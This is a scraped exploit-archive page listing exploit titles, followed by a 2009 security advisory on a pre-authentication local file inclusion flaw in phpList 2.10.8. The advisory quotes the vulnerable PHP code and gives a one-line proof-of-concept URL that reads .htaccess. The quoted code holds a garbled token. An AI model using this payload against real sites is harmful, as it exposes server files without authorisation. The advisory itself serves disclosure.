477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
79 lines
2.6 KiB
Text
Executable file
79 lines
2.6 KiB
Text
Executable file
########################## www.BugReport.ir #########################
|
|
#
|
|
# AmnPardaz Security Research Team
|
|
#
|
|
# Title: phpList Local File inclusion
|
|
# Vendor: http://www.phplist.com
|
|
# Bug: Local File Inclusion
|
|
# Vulnerable Version: 2.10.8 (prior versions also may be affected)
|
|
# Exploitation: Remote with browser
|
|
# Fix: N/A
|
|
# Original Advisory: http://www.bugreport.ir/index_60.htm
|
|
###################################################################
|
|
|
|
|
|
####################
|
|
- Description:
|
|
####################
|
|
|
|
Quote From vendor:"phplist is an open-source newsletter manager. phplist is free to download, install and use, and is easy to integrate with any website.
|
|
phplist is downloaded more than 10 000 times per month and is listed in the top open source projects for vitality score on Freshmeat.
|
|
phplist is sponsored by tincan."
|
|
|
|
|
|
####################
|
|
- Vulnerability:
|
|
####################
|
|
|
|
+--> Local File Inclusion
|
|
|
|
Because of the vulnerability in "admin/index.php", When "register_globals" is disabled (Default PHP Configuration) It is possible for remote attackers to
|
|
include arbitrary files from local resources before performing authentication.
|
|
|
|
Code Snippet:
|
|
/lists/admin.php #line:10-18
|
|
|
|
if (!ini_get("register_globals") || ini_get("register_globals") == "off") {
|
|
# fix register globals, for now, should be phased out gradually
|
|
# sure, this gets around the entire reason that regLANGUAGE_SWITCHister globals
|
|
# should be off, but going through three years of code takes a long time....
|
|
|
|
foreach ($_REQUEST as $key => $val) {
|
|
$$key = $val;
|
|
}
|
|
}
|
|
|
|
/lists/admin.php #line:41-56
|
|
|
|
if (isset($_SERVER["ConfigFile"]) && is_file($_SERVER["ConfigFile"])) {
|
|
print '<!-- using '.$_SERVER["ConfigFile"].'-->'."\n";
|
|
include $_SERVER["ConfigFile"];
|
|
} elseif (isset($cline["c"]) && is_file($cline["c"])) {
|
|
print '<!-- using '.$cline["c"].' -->'."\n";
|
|
include $cline["c"];
|
|
} elseif (isset($_ENV["CONFIG"]) && is_file($_ENV["CONFIG"])) {
|
|
# print '<!-- using '.$_ENV["CONFIG"].'-->'."\n";
|
|
include $_ENV["CONFIG"];
|
|
} elseif (is_file("../config/config.php")) {
|
|
print '<!-- using ../config/config.php -->'."\n";
|
|
include "../config/config.php";
|
|
} else {
|
|
print "Error, cannot find config file\n";
|
|
exit;
|
|
}
|
|
|
|
####################
|
|
- POC:
|
|
####################
|
|
|
|
http://www.example.com/lists/admin/index.php?_SERVER[ConfigFile]=../.htaccess
|
|
|
|
####################
|
|
- Credit:
|
|
####################
|
|
AmnPardaz Security Research Team
|
|
Contact: admin[4t}bugreport{d0t]ir
|
|
www.BugReport.ir
|
|
www.AmnPardaz.com
|
|
|
|
# milw0rm.com [2009-01-14]
|